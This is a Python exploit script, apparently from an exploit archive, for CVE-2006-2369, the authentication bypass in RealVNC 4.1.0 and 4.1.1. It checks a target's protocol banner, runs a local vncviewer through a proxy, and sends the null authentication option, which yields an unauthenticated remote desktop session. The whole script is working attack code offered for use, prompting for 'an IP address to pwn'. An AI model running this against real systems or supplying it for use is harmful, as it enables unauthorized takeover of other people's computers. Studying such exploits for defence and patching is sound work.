# Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit
# Date: 2012-05-13
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1.0 and 4.1.1
# Tested on: Windows XP
# CVE: CVE-2006-2369
# Requires vncviewer installed
# Basic port of hdmoore/msf2 perl version to python for fun and profit (ease of use)
import select
import thread
import os
import socket
import sys, re
BIND_ADDR = '127.0.0.1'
BIND_PORT = 4444
def pwn4ge(host, port):
socket.setdefaulttimeout(5)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.connect((host, port))
except socket.error, msg:
print '[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]
sys.exit();
else:
hello = server.recv(12)
print "[*] Hello From Server: " + hello
if hello != "RFB 003.008\n":
print "[*] The remote VNC service is not vulnerable"
sys.exit()
else:
print "[*] The remote VNC service is vulnerable"
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
listener.bind((BIND_ADDR, BIND_PORT))
except socket.error , msg:
print '[*] Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print "[*] Listener Socket Bind Complete"
listener.listen(10)
print "[*] Launching local vncviewer"
thread.start_new_thread(os.system,('vncviewer ' + BIND_ADDR + '::' + str(BIND_PORT),))
print "[*] Listener waiting for VNC connections on localhost"
client, caddr = listener.accept()
listener.close()
client.send(hello)
chello = client.recv(12)
server.send(chello)
methods = server.recv(2)
print "[*] Auth Methods Recieved. Sending Null Authentication Option to Client"
client.send("\x01\x01")
client.recv(1)
server.send("\x01")
server.recv(4)
client.send("\x00\x00\x00\x00")
print "[*] Proxying data between the connections..."
running = True
while running:
selected = select.select([client, server], [], [])[0]
if client in selected:
buf = client.recv(8192)
if len(buf) == 0:
running = False
server.send(buf)
if server in selected and running:
buf = server.recv(8192)
if len(buf) == 0:
running = False
client.send(buf)
pass
client.close()
server.close()
sys.exit()
def printUsage():
print "[*] Read the source, Luke!"
def main():
try:
SERV_ADDR = sys.argv[1]
SERV_PORT = sys.argv[2]
except:
SERV_ADDR = raw_input("[*] Please input an IP address to pwn: ")
SERV_PORT = 5900
try:
socket.inet_aton(SERV_ADDR)
except socket.error:
printUsage()
else:
pwn4ge(SERV_ADDR, int(SERV_PORT))
if __name__ == "__main__":
main()